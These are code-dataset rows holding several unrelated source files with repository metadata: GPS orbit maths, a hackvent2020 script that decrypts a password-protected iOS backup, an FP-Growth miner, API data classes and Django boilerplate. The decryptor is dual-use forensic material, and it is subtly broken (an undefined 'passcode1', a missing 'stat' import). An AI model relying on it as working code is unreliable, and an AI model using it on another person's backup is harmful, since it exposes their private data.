v_sv_ecef - Velocity of satellite in ECEF [m/s]
"""
# Formulate filename and retrieve nav data
navFile='filler'
if type(gpsSec) == float and usefile == None:
navFile = 'gpsW_SOW_{}_{:.4f}_navData.csv'.format(int(gpsWeek), gpsSec)
elif type(gpsSec) != float and usefile == None:
navFile = 'gpsW_SOW_{}_{}_navData.csv'.format(int(gpsWeek), gpsSec)
elif usefile != None:
navFile = usefile
navDF = pd.read_csv(navdir + navFile)
sat = navDF[navDF['SVID']==svID]
# load in variables needed
GM = 3.986005e14 # Earth gravitational parameter m3/s2
OmegaE = 7.2921151467e-5 # Earth mean rotation rate rad/s
t_oe = float(sat['te']) # ephemeris epoch
t = float(sat['tc']) # clock time
A = float(sat['sqrta']**2)
dn = float(sat['dn'])
M0 = float(sat['M0'])
a0 = float(sat['af0'])
a1 = float(sat['af1'])
a2 = float(sat['af2'])
e = float(sat['e'])
i0 = float(sat['i0'])
L0 = float(sat['L0'])
i_dot = float(sat['didt'])
lan_dot = float(sat['dOdt'])
omega0 = float(sat['omega0'])
C_uc = float(sat['Cuc'])
C_us = float(sat['Cus'])
C_rc = float(sat['Crc'])
C_rs = float(sat['Crs'])
C_ic = float(sat['Cic'])
C_is = float(sat['Cis'])
if printSat:
print(sat)
# initial computations for perifocal state
dtc = a0 + a1*(gpsSec - t) + a2*((gpsSec - t)**2)
tc = t_oe - dtc
tk = gpsSec - tc
n0 = np.sqrt(GM / A**3)
n = n0 + dn
M = M0 + n*tk
E = M
# Kepler's equation Newton's method for Eccentric Anomaly
orbmath = OrbitalMath()
# Only 20 iterations used
E = orbmath.E_newton(M, e, max_iter=20)
v_k = orbmath.true_anomaly_from_E(E, e) # true anomaly
argl_k = v_k + omega0
# correction terms
dargl = C_us*np.sin(2*argl_k) + C_uc*np.cos(2*argl_k)
dr = C_rs*np.sin(2*argl_k) + C_rc*np.cos(2*argl_k)
dinc = C_is*np.sin(2*argl_k) + C_ic*np.cos(2*argl_k)
# corrected terms
argl = argl_k + dargl
r_k = A*(1 - e*np.cos(E)) + dr
i_k = i0 + dinc + i_dot*tk
# position in perifocal frame
p_x = r_k*np.cos(argl)
p_y = r_k*np.sin(argl)
# corrected longitude of ascending node
lan_k = L0 + (lan_dot - OmegaE)*tk - OmegaE * t_oe
# ECEF position
x_ecef = p_x*np.cos(lan_k) - p_y*np.cos(i_k)*np.sin(lan_k)
y_ecef = p_x*np.sin(lan_k) + p_y*np.cos(i_k)*np.cos(lan_k)
z_ecef = p_y*np.sin(i_k)
# intermediate terms for satellite velocity
E_k_dot = n / (1 - e*np.cos(E))
v_k_dot = E_k_dot*np.sqrt(1-e**2) / (1 - e*np.cos(E))
i_k_dot = i_dot + 2*v_k_dot*(C_is*np.cos(2*argl_k) - C_ic*np.sin(2*argl_k))
argl_dot = v_k_dot + 2*v_k_dot*(C_us*np.cos(2*argl_k) - C_uc*np.sin(2*argl_k))
r_k_dot = e*A*E_k_dot*np.sin(E) + 2*v_k_dot*(C_rs*np.cos(2*argl_k) - C_rc*np.sin(2*argl_k))
lan_k_dot = lan_dot - OmegaE
# perifocal velocity
p_vx = r_k_dot*np.cos(argl_k) - r_k*argl_dot*np.sin(argl_k)
p_vy = r_k_dot*np.sin(argl_k) + r_k*argl_dot*np.cos(argl_k)
# ECEF velocity
Vx_ecef = -p_x*lan_k_dot*np.sin(lan_k) + \
p_vx*np.cos(lan_k) - \
p_vy*np.sin(lan_k)*np.cos(i_k) - \
p_y*( lan_k_dot*np.cos(lan_k)*np.cos(i_k) - i_k_dot*np.sin(lan_k)*np.sin(i_k) )
Vy_ecef = p_x*lan_k_dot*np.cos(lan_k) + \
p_vx*np.sin(lan_k) + \
p_vy*np.cos(lan_k)*np.cos(i_k) - \
p_y*( lan_k_dot*np.sin(lan_k)*np.cos(i_k) + i_k_dot*np.cos(lan_k)*np.sin(i_k) )
Vz_ecef = p_vy*np.sin(i_k) + p_y*i_k_dot*np.cos(i_k)
# place into arrays and return
R_ecef = np.array([x_ecef, y_ecef, z_ecef]).reshape((3,1)) * u.meter
V_ecef = np.array([Vx_ecef, Vy_ecef, Vz_ecef]).reshape((3,1)) * u.meter/u.second
return R_ecef, V_ecef
def satelaz(r_sv_ecef, r_rx_ecef):
"""
Compute satellite azimuth and elevation angle with respect to the
receiver in ECEF.
Inputs:
r_sv_ecef (m) : 3x1 position vector of satellite in ECEF
r_rx_ecef (m) : 3x1 position vector of receiver in ECEF
Outputs:
az (rad) : azimuth angle
el (rad) : elevation angle
"""
# Compute satellite wrt receiver in ECEF
r_sv_rx_ecef = r_sv_ecef - r_rx_ecef
# transform relative vector to ENU
wgs84 = WGS84()
lat, lon, h = wgs84.ecef_to_geodetic(r_rx_ecef)
T_ecef_enu = wgs84.ecef_to_enu(lat, lon)
r_sv_rx_enu = np.matmul(T_ecef_enu, r_sv_rx_ecef)
# Compute azimuth and elevation
east = r_sv_rx_enu[0,0]
north = r_sv_rx_enu[1,0]
up = r_sv_rx_enu[2,0]
az = np.arctan2(east, north)
el = (0.5*np.pi * u.radian) - np.arccos( up / np.linalg.norm(r_sv_rx_enu) )
return az, el
def satmap(navFile, r_rx_ecef, el_mask_deg, gpsWeek, gpsSecVec, navdir=DIR, plot_flag=False):
"""
Generate plotting data for SV's above a particular
receiver position over a span of GPS seconds.
Inputs:
navFile : csv navigation file
r_rx_ecef (m) : 3x1 receiver position in ECEF
el_mas_deg (deg) : elevation cutoff
gpsWeek : Gps week number
gpsSecVec (s) : Gps seconds array
plot_flag : flag to create sky plot (plot if True)
Outputs:
svIds : Unique SV ID numbers to be plotted
sv_data : Nt*Nsv by 4 array in the form
[svId, gpsSec, az, el
svId, gpsSec, az, el
.
.
svId, gpsSec, az, el]
"""
# 32 SVIDs in each navfile
SVIDs = range(1,33)
ephem = pd.read_csv(navdir + navFile)
elrad = np.deg2rad(el_mask_deg) * u.radian
# sats_in_view will hold all svids in view at each GpsSec
svIds = []
sv_data = np.zeros(4)
for gpsSec in gpsSecVec:
for sv in SVIDs:
if np.any(ephem['SVID'] == sv):
# grab sat ecef position
R_sat, V_sat = satloc(gpsWeek, gpsSec, sv, usefile=navFile)
# grab azimuth, elevation from receiver
az, el = satelaz(R_sat, r_rx_ecef)
# check if equal to or above elevation threshold
if el >= elrad:
if sv not in svIds:
svIds.append(sv)
data = [sv, gpsSec, el.value, az.value]
sv_data = np.vstack((sv_data, data))
# delete first row, it was just used as a initializer
sv_data = np.delete(sv_data, 0, 0)
if plot_flag:
# import matlab runner
sys.path.insert(1, '/Applications/MATLAB_R2020a.app')
import matlab.engine
try:
eng = matlab.engine.start_matlab()
satdata = ndarray2matlab(sv_data)
eng.plotsat(satdata, float(gpsWeek), float(elrad), nargout=0)
eng.quit()
except Exception as e:
print("\nSomething went wrong with MATLAB... here is the exception\n")
print(e)
return svIds, sv_data
def channel2navsol(gpsWeek, gpsSec, svID, sec_n=None, rx_ecef=None, createf=False):
# first, get the data from the matlab script
if createf:
createNavDataCsv(gpsWeek, gpsSec)
# grab that file to get position and then delete later
usesec = gpsSec
if sec_n != None:
usesec = sec_n
navFile='filler'
if type(gpsSec) == float:
navFile = 'gpsW_SOW_{}_{:.4f}_navData.csv'.format(int(gpsWeek), usesec)
else:
navFile = 'gpsW_SOW_{}_{}_navData.csv'.format(int(gpsWeek), usesec)
# get position of SV
r_sv_ecef, v_ecef = satloc(gpsWeek, gpsSec, svID, usefile=navFile)
if rx_ecef != None:
az, el = satelaz(r_sv_ecef, rx_ecef)
return r_sv_ecef, el
return r_sv_ecef
def main():
print('Using satloc functionality...')
if __name__ == "__main__":
main() | [
"william.fife@utexas.edu"
] | william.fife@utexas.edu |
579336648163e63ff39d3fbf581b6bad5c221ccf | 15a5387c4ad0327b4b08571e5f14fa83a0b686fd | /dec23/decrypt.py | a5b4873bd15ce0acf1f4ff57d33f1ee136ecd843 | [] | no_license | maennel/hackvent2020 | f0759d32a902aa7582e233233d45c84f1cc775c9 | 4b176d5ab322b205cd54e2325b2398e9fc51232e | refs/heads/master | 2023-02-10T23:10:53.643922 | 2021-01-04T15:42:33 | 2021-01-04T15:42:33 | 325,392,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,217 | py | #!/usr/bin/env python3.7
# coding: UTF-8
from __future__ import print_function
from __future__ import division
import argparse
import getpass
import os.path
import pprint
import random
import shutil
import sqlite3
import string
import struct
import tempfile
from binascii import hexlify
import Crypto.Cipher.AES # https://www.dlitz.net/software/pycrypto/
import biplist
import fastpbkdf2
from biplist import InvalidPlistException
def main():
## Parse options
parser = argparse.ArgumentParser()
parser.add_argument('--backup-directory', dest='backup_directory',
default='testdata/encrypted')
parser.add_argument('--password-pipe', dest='password_pipe',
help="""\
Keeps password from being visible in system process list.
Typical use: --password-pipe=<(echo -n foo)
""")
parser.add_argument('--no-anonymize-output', dest='anonymize',
action='store_false')
args = parser.parse_args()
global ANONYMIZE_OUTPUT
ANONYMIZE_OUTPUT = args.anonymize
if ANONYMIZE_OUTPUT:
print('Warning: All output keys are FAKE to protect your privacy')
manifest_file = os.path.join(args.backup_directory, 'Manifest.plist')
with open(manifest_file, 'rb') as infile:
manifest_plist = biplist.readPlist(infile)
keybag = Keybag(manifest_plist['BackupKeyBag'])
# the actual keys are unknown, but the wrapped keys are known
keybag.printClassKeys()
if args.password_pipe:
password = readpipe(args.password_pipe)
if password.endswith(b'\n'):
password = password[:-1]
else:
password = getpass.getpass('Backup password: ').encode('utf-8')
## Unlock keybag with password
if not keybag.unlockWithPasscode(password):
raise Exception('Could not unlock keybag; bad password?')
# now the keys are known too
keybag.printClassKeys()
## Decrypt metadata DB
print(manifest_plist.keys())
manifest_key = manifest_plist['ManifestKey'][4:]
with open(os.path.join(args.backup_directory, 'Manifest.db'), 'rb') as db:
encrypted_db = db.read()
manifest_class = struct.unpack('<l', manifest_plist['ManifestKey'][:4])[0]
key = keybag.unwrapKeyForClass(manifest_class, manifest_key)
decrypted_data = AESdecryptCBC(encrypted_db, key)
temp_dir = tempfile.mkdtemp()
try:
# Does anyone know how to get Python’s SQLite module to open some
# bytes in memory as a database?
db_filename = os.path.join(temp_dir, 'db.sqlite3')
with open(db_filename, 'wb') as db_file:
db_file.write(decrypted_data)
conn = sqlite3.connect(db_filename)
conn.row_factory = sqlite3.Row
c = conn.cursor()
# c.execute("select * from Files limit 1");
# r = c.fetchone()
c.execute("""
SELECT fileID, domain, relativePath, file
FROM Files
WHERE relativePath LIKE 'Media/PhotoData/MISC/DCIM_APPLE.plist'
ORDER BY domain, relativePath""")
results = c.fetchall()
finally:
shutil.rmtree(temp_dir)
for item in results:
fileID, domain, relativePath, file_bplist = item
plist = biplist.readPlistFromString(file_bplist)
file_data = plist['$objects'][plist['$top']['root'].integer]
size = file_data['Size']
protection_class = file_data['ProtectionClass']
encryption_key = plist['$objects'][
file_data['EncryptionKey'].integer]['NS.data'][4:]
backup_filename = os.path.join(args.backup_directory,
fileID[:2], fileID)
with open(backup_filename, 'rb') as infile:
data = infile.read()
key = keybag.unwrapKeyForClass(protection_class, encryption_key)
# truncate to actual length, as encryption may introduce padding
decrypted_data = AESdecryptCBC(data, key)[:size]
print('== decrypted data:')
print(wrap(decrypted_data))
print()
print('== pretty-printed plist')
pprint.pprint(biplist.readPlistFromString(decrypted_data))
##
# this section is mostly copied from parts of iphone-dataprotection
# http://code.google.com/p/iphone-dataprotection/
CLASSKEY_TAGS = [b"CLAS",b"WRAP",b"WPKY", b"KTYP", b"PBKY"] #UUID
KEYBAG_TYPES = ["System", "Backup", "Escrow", "OTA (icloud)"]
KEY_TYPES = ["AES", "Curve25519"]
PROTECTION_CLASSES={
1:"NSFileProtectionComplete",
2:"NSFileProtectionCompleteUnlessOpen",
3:"NSFileProtectionCompleteUntilFirstUserAuthentication",
4:"NSFileProtectionNone",
5:"NSFileProtectionRecovery?",
6: "kSecAttrAccessibleWhenUnlocked",
7: "kSecAttrAccessibleAfterFirstUnlock",
8: "kSecAttrAccessibleAlways",
9: "kSecAttrAccessibleWhenUnlockedThisDeviceOnly",
10: "kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly",
11: "kSecAttrAccessibleAlwaysThisDeviceOnly"
}
WRAP_DEVICE = 1
WRAP_PASSCODE = 2
class Keybag(object):
def __init__(self, data):
self.type = None
self.uuid = None
self.wrap = None
self.deviceKey = None
self.attrs = {}
self.classKeys = {}
self.KeyBagKeys = None #DATASIGN blob
self.parseBinaryBlob(data)
print(self.attrs)
def parseBinaryBlob(self, data):
currentClassKey = None
for tag, data in loopTLVBlocks(data):
if len(data) == 4:
data = struct.unpack(">L", data)[0]
if tag == b"TYPE":
self.type = data
if self.type > 3:
print("FAIL: keybag type > 3 : %d" % self.type)
elif tag == b"UUID" and self.uuid is None:
self.uuid = data
elif tag == b"WRAP" and self.wrap is None:
self.wrap = data
elif tag == b"UUID":
if currentClassKey:
self.classKeys[currentClassKey[b"CLAS"]] = currentClassKey
currentClassKey = {b"UUID": data}
elif tag in CLASSKEY_TAGS:
currentClassKey[tag] = data
else:
self.attrs[tag] = data
if currentClassKey:
self.classKeys[currentClassKey[b"CLAS"]] = currentClassKey
def unlockWithPasscode(self, passcode):
# passcode1 = fastpbkdf2.pbkdf2_hmac('sha256', passcode,
# self.attrs[b"DPSL"],
# self.attrs[b"DPIC"], 32)
passcode_key = fastpbkdf2.pbkdf2_hmac('sha1', passcode1,
self.attrs[b"SALT"],
self.attrs[b"ITER"], 32)
print('== Passcode key')
print(anonymize(hexlify(passcode_key)))
for classkey in self.classKeys.values():
if b"WPKY" not in classkey:
continue
k = classkey[b"WPKY"]
if classkey[b"WRAP"] & WRAP_PASSCODE:
k = AESUnwrap(passcode_key, classkey[b"WPKY"])
if not k:
return False
classkey[b"KEY"] = k
return True
def unwrapKeyForClass(self, protection_class, persistent_key):
ck = self.classKeys[protection_class][b"KEY"]
if len(persistent_key) != 0x28:
raise Exception("Invalid key length")
return AESUnwrap(ck, persistent_key)
def printClassKeys(self):
print("== Keybag")
print("Keybag type: %s keybag (%d)" % (KEYBAG_TYPES[self.type], self.type))
print("Keybag version: %d" % self.attrs[b"VERS"])
print("Keybag UUID: %s" % anonymize(hexlify(self.uuid)))
print("-"*209)
print("".join(["Class".ljust(53),
"WRAP".ljust(5),
"Type".ljust(11),
"Key".ljust(65),
"WPKY".ljust(65),
"Public key"]))
print("-"*208)
for k, ck in self.classKeys.items():
if k == 6:print("")
print("".join(
[PROTECTION_CLASSES.get(k).ljust(53),
str(ck.get(b"WRAP","")).ljust(5),
KEY_TYPES[ck.get(b"KTYP",0)].ljust(11),
anonymize(hexlify(ck.get(b"KEY", b""))).ljust(65),
anonymize(hexlify(ck.get(b"WPKY", b""))).ljust(65),
]))
print()
def loopTLVBlocks(blob):
i = 0
while i + 8 <= len(blob):
tag = blob[i:i+4]
length = struct.unpack(">L",blob[i+4:i+8])[0]
data = blob[i+8:i+8+length]
yield (tag,data)
i += 8 + length
def unpack64bit(s):
return struct.unpack(">Q",s)[0]
def pack64bit(s):
return struct.pack(">Q",s)
def AESUnwrap(kek, wrapped):
C = []
for i in range(len(wrapped)//8):
C.append(unpack64bit(wrapped[i*8:i*8+8]))
n = len(C) - 1
R = [0] * (n+1)
A = C[0]
for i in range(1,n+1):
R[i] = C[i]
for j in reversed(range(0,6)):
for i in reversed(range(1,n+1)):
todec = pack64bit(A ^ (n*j+i))
todec += pack64bit(R[i])
B = Crypto.Cipher.AES.new(kek).decrypt(todec)
A = unpack64bit(B[:8])
R[i] = unpack64bit(B[8:])
if A != 0xa6a6a6a6a6a6a6a6:
return None
res = b"".join(map(pack64bit, R[1:]))
return res
ZEROIV = "\x00"*16
def AESdecryptCBC(data, key, iv=ZEROIV, padding=False):
if len(data) % 16:
print("AESdecryptCBC: data length not /16, truncating")
data = data[0:(len(data)/16) * 16]
data = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_CBC, iv).decrypt(data)
if padding:
return removePadding(16, data)
return data
##
# here are some utility functions, one making sure I don’t leak my
# secret keys when posting the output on Stack Exchange
anon_random = random.Random(0)
memo = {}
def anonymize(s):
if type(s) == str:
s = s.encode('utf-8')
global anon_random, memo
if ANONYMIZE_OUTPUT:
if s in memo:
return memo[s]
possible_alphabets = [
string.digits,
string.digits + 'abcdef',
string.ascii_letters,
"".join(chr(x) for x in range(0, 256)),
]
for a in possible_alphabets:
if all((chr(c) if type(c) == int else c) in a for c in s):
alphabet = a
break
ret = "".join([anon_random.choice(alphabet) for i in range(len(s))])
memo[s] = ret
return ret
else:
return s
def wrap(s, width=78):
"Return a width-wrapped repr(s)-like string without breaking on \’s"
s = repr(s)
quote = s[0]
s = s[1:-1]
ret = []
while len(s):
i = s.rfind('\\', 0, width)
if i <= width - 4: # "\x??" is four characters
i = width
ret.append(s[:i])
s = s[i:]
return '\n'.join("%s%s%s" % (quote, line ,quote) for line in ret)
def readpipe(path):
if stat.S_ISFIFO(os.stat(path).st_mode):
with open(path, 'rb') as pipe:
return pipe.read()
else:
raise Exception("Not a pipe: {!r}".format(path))
if __name__ == '__main__':
main()
| [
"mjeckelmann@gmail.com"
] | mjeckelmann@gmail.com |
b0d6aed1f1db0f7b5097cc2e16707e5b2225e718 | 33cb00ba2ce1fc763d20af2a27ca518c68f3ee8c | /FpGrowth.py | 80a12690bd8446326924dafa365c6faea60013a6 | [
"MIT"
] | permissive | MohanL/apriori-Fpgrowth | 50ac552ffad3992fa49c3da9412d0c6436238f18 | 8cc6477f7bc6c86224ca50775c8a46caa77ea07c | refs/heads/master | 2021-01-10T16:22:10.126249 | 2015-12-24T11:52:28 | 2015-12-24T11:52:28 | 44,637,957 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,526 | py | """
Description : Python implementation of FpGrowth Algorithm
Usage $python main.py -f [filename] -s [minSupport] -c [minConfidence]
"""
from treelib import Node, Tree
from collections import Counter
import operator
from optparse import OptionParser
globNumberOfTransactions = 0.0
globOriginalList = None
globMinSup = 0
globMinConf = 0
def readFile(filename):
originalList = list()
file = open(filename, 'rU')
c = 0
for line in file:
c = c+1
line = line.strip().rstrip(',')
record = set(line.split(', '))
originalList.append(record)
global globNumberOfTransactions
globNumberOfTransactions = c
global globOriginalList
globOriginalList = originalList
#print(globOriginalList)
def getSizeOneItemSet(originalList):
Cone = list()
for s in originalList:
for e in s:
Cone.append(e)
return sorted(Cone)
def priorityDic(objectList):
kDict = Counter(objectList)
return kDict
def FpGrowth(fName):
readFile(fName)
Cone = getSizeOneItemSet(globOriginalList)
priorityDict = priorityDic(Cone)
#print(priorityDict)
tree = Tree()
tree.create_node("{}", "root")
#reconstruct the whole transction database based on the priority
counter = 0
for set in globOriginalList:
temp = dict()
for element in set:
priority = priorityDict.get(element)
temp.update({element:priority})
sorted_temp = sorted(temp.items(), key=operator.itemgetter(1))
sorted_temp.reverse()
#print(sorted_temp)
# construct Fp tree
root = "root"
for tuple in sorted_temp:
if(not tree.contains(tuple[0])):
tree.create_node(tuple[0], tuple[0], root, 0)
root = tuple[0]
else:
if tuple[0] in tree.is_branch(root):
#print("node already in this branch, don't know what to do")
#print("going down")
root = tuple[0]
#print(root)
else:
#print("should create a duplicate node")
tree.create_node(tuple[0], counter, root, 0)
root = counter
counter += 1
# I need to decide whether to create a new node or not
# the condition is under this branch if this node exist
# so I should check the root
tree.show()
if __name__ == "__main__":
optparser = OptionParser()
optparser.add_option('-f', '--inputFile',
dest = 'inputFile',
help = 'data file',
default = "data/test.txt")
optparser.add_option('-s','--minSupport',
dest = 'minSup',
help = 'Minimum Support',
default = 0.3,
type ='float')
optparser.add_option('-c','--minConfidence',
dest = 'minConf',
help = 'Minimum Confidence',
default = 0.6,
type ='float')
(options, args) = optparser.parse_args()
fName = None
if options.inputFile is None:
fName = "240P1/adult.data"
elif options.inputFile is not None:
fName = options.inputFile
globMinSup = options.minSup
globMinConf = options.minConf
FpGrowth(fName)
| [
"mohan.liu.personal@gmail.com"
] | mohan.liu.personal@gmail.com |
402813e46363d893f713f9b23211050e901d6869 | 293f6cea829e02564c0623a3fcd7763ed1f5d6fd | /piplapis/data/available_data.py | b2ceeb63738aea86933643708e9d1e0390a3231e | [
"Apache-2.0"
] | permissive | ivosvetla88/piplapis-python | d6fdfee814ab4a1f7ba8fb4db7002dbec61d2ab0 | 7334de5fd0f815ec88905db2f95a59df80d6fbe5 | refs/heads/master | 2021-01-17T11:45:57.013803 | 2016-03-17T10:21:31 | 2016-03-17T10:21:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,439 | py | from piplapis.data.utils import Serializable
class AvailableData(Serializable):
children = ('basic', 'premium')
def __init__(self, basic=None, premium=None, *args, **kwargs):
self.basic = basic
self.premium = premium
def to_dict(self):
d = {}
if self.basic is not None and type(self.basic) == FieldCount:
d['basic'] = self.basic.to_dict()
if self.premium is not None and type(self.premium) == FieldCount:
d['premium'] = self.premium.to_dict()
return d
@classmethod
def from_dict(cls, d):
basic = d.get('basic')
premium = d.get('premium')
ins = cls()
if basic is not None:
ins.basic = FieldCount.from_dict(basic)
if premium is not None:
ins.premium = FieldCount.from_dict(premium)
return ins
class FieldCount(Serializable):
children = ('addresses', 'ethnicities', 'emails', 'dobs', 'genders', 'user_ids', 'social_profiles',
'educations', 'jobs', 'images', 'languages', 'origin_countries', 'names', 'phones',
'relationships', 'usernames')
def __init__(self, addresses=None, ethnicities=None, emails=None, dobs=None,
genders=None, user_ids=None, social_profiles=None, educations=None, jobs=None, images=None,
languages=None, origin_countries=None, names=None, phones=None, relationships=None,
usernames=None, *args, **kwargs):
"""
A summary of the data within an API response
:param addresses: int, the number of addresses
:param ethnicities: int, the number of ethnicities
:param emails: int, the number of emails
:param dobs: int, the number of dobs
:param genders: int, the number of genders
:param user_ids: int, the number of user ids
:param social_profiles: int, the number of social profile sources
:param educations: int, the number of educations
:param jobs: int, the number of jobs
:param images: int, the number of images
:param languages: int, the number of languages
:param origin_countries: int, the number of origin countries
:param names: int, the number of names
:param phones: int, the number of phones
:param relationships: int, the number of relationships
:param usernames: int, the number of usernames
"""
self.dobs = dobs
self.images = images
self.educations = educations
self.addresses = addresses
self.jobs = jobs
self.genders = genders
self.ethnicities = ethnicities
self.phones = phones
self.origin_countries = origin_countries
self.ethnicities = ethnicities
self.usernames = usernames
self.languages = languages
self.emails = emails
self.user_ids = user_ids
self.relationships = relationships
self.names = names
self.social_profiles = social_profiles
def to_dict(self):
d = {}
for child in self.children:
if getattr(self, child) > 0:
d[child] = getattr(self, child)
return d
@classmethod
def from_dict(cls, d):
kwargs = {}
for key, value in d.iteritems():
if key in cls.children and type(value) == int:
kwargs[key] = value
return cls(**kwargs)
| [
"josh.liberty@pipl.com"
] | josh.liberty@pipl.com |
a269a7226604cf187ef5653174f1c4c263b1f6a7 | 92dd6a174bf90e96895127bb562e3f0a05d6e079 | /apply dfs and bfs/섬나라 아일랜드.py | d24817c5606aba77e667c87bdc35fa782e3a2e65 | [] | no_license | 123qpq/inflearn_python | caa4a86d051d76bf5612c57ae9578f1925abc5a9 | 5904cedabea9d5bc4afa3f1f76911dfccce754b5 | refs/heads/main | 2023-03-12T05:14:06.162651 | 2021-02-28T14:03:58 | 2021-02-28T14:03:58 | 338,735,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | from collections import deque
n = int(input())
table = [list(map(int, input().split())) for _ in range(n)]
dx = [-1, -1, 0, 1, 1, 1, 0, -1]
dy = [0, 1, 1, 1, 0, -1, -1, -1]
q = deque()
cnt = 0
for i in range(n):
for j in range(n):
if table[i][j] == 1:
table[i][j] = 0
q.append((i, j))
while q:
now = q.popleft()
for a in range(8):
xx = now[0] + dx[a]
yy = now[1] + dy[a]
if 0 <= xx < n and 0 <= yy < n and table[xx][yy] == 1:
table[xx][yy] = 0
q.append((xx, yy))
cnt += 1
print(cnt) | [
"45002168+123qpq@users.noreply.github.com"
] | 45002168+123qpq@users.noreply.github.com |
6420eb175c932c58d4a7dbb0d816742e4b73a937 | 10e3f9659affb4c74280ee27a6e485c8d7e86c56 | /pySamples/testGetAttrCurrentMod.py | caf4f2d91dc7c82e451f01b45b68844100f9c59a | [] | no_license | benwei/Learnings | a52a751e6ba9bbbbf7b51b0e6b6ac5e839a87cd3 | e020698c2be16bf7eb1c7fb9bf19276165cc0400 | refs/heads/master | 2023-02-04T22:27:00.182020 | 2023-01-19T16:52:31 | 2023-01-19T16:57:43 | 1,994,139 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | import sys
def test():
print "getattr current mode run: test()"
o = getattr(sys.modules[__name__], 'test')
if o:
o()
| [
"ben@staros.mobi"
] | ben@staros.mobi |
b8650f08115fc04e8145f89e4f8811f0521fc19b | c4589dc8775e3005230b6a47a454d68d6725f7f4 | /twitter/mole/migrations/0001_initial.py | e950ff611a3d02afbec092873e6bb027a6b87505 | [] | no_license | mriverov/tip.twitter | 8338980bf81850265fdec5871e838af7c513b811 | 2790d6516d585f8693e9b44e1c0dfd50a1d89f5c | refs/heads/master | 2020-04-06T03:33:25.825610 | 2016-08-13T22:10:09 | 2016-08-13T22:10:09 | 19,164,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-13 05:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='KeyWord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100, null=True)),
('count', models.IntegerField(blank=True, default=0, null=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Trend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.CharField(blank=True, max_length=500, null=True)),
('tweets_count', models.IntegerField(blank=True, default=0, null=True)),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project')),
],
),
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.BigIntegerField(blank=True, null=True)),
('text', models.CharField(blank=True, max_length=5000, null=True)),
('retweet_count', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('retweet_id', models.BigIntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.BigIntegerField(blank=True, null=True)),
('screen_name', models.CharField(blank=True, default=b'', max_length=500, null=True)),
('followers_count', models.IntegerField(blank=True, default=0, null=True)),
('location', models.CharField(blank=True, default=b'', max_length=500, null=True)),
('centrality', models.FloatField(blank=True, default=0.0, null=True)),
('followers', models.ManyToManyField(blank=True, null=True, related_name='_user_followers_+', to='mole.User')),
],
),
migrations.AddField(
model_name='tweet',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.User'),
),
migrations.AddField(
model_name='tweet',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
),
migrations.AddField(
model_name='tweet',
name='trend',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Trend'),
),
migrations.AddField(
model_name='keyword',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
),
]
| [
"mrivero@Marina.local"
] | mrivero@Marina.local |
96eee24baac64893bcfc7cf561ff29fe704e7ae1 | e902e5fc2d79203bff2e716a63054d3cdb667f23 | /Casa/wsgi.py | b2677e2dcad63b0cb8a4944a304a5877d20a98e9 | [] | no_license | amanjaiswalofficial/Casa | a6625f92019b11a8804d78c04f377cc5e7262634 | d9eea1b4b8b7bbb01ae67bcaf44a5e1b594bf847 | refs/heads/master | 2020-05-04T02:00:52.777164 | 2019-04-23T08:57:05 | 2019-04-23T08:57:05 | 178,918,528 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for Casa project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Casa.settings')
application = get_wsgi_application()
| [
"amanjai01.gmail.com"
] | amanjai01.gmail.com |
b0d8a79b1e2380094e3fecd28ce37d7f093034af | e6378e26e05ddad794f770b83bc0471c13da6452 | /myproject_3/myproject_3/settings.py | fcf3991bded13e4db0091ee0c0c865cd9813120c | [] | no_license | dheerajgadhamsetty/REST_API | 122954bfc3dae2de0d218b8909792d3f75480903 | d370c7cce5ed6b325755ab243c20f58335cafbba | refs/heads/master | 2023-07-18T08:12:15.463796 | 2021-08-29T06:53:28 | 2021-08-29T06:53:28 | 400,971,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,289 | py | """
Django settings for myproject_3 project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
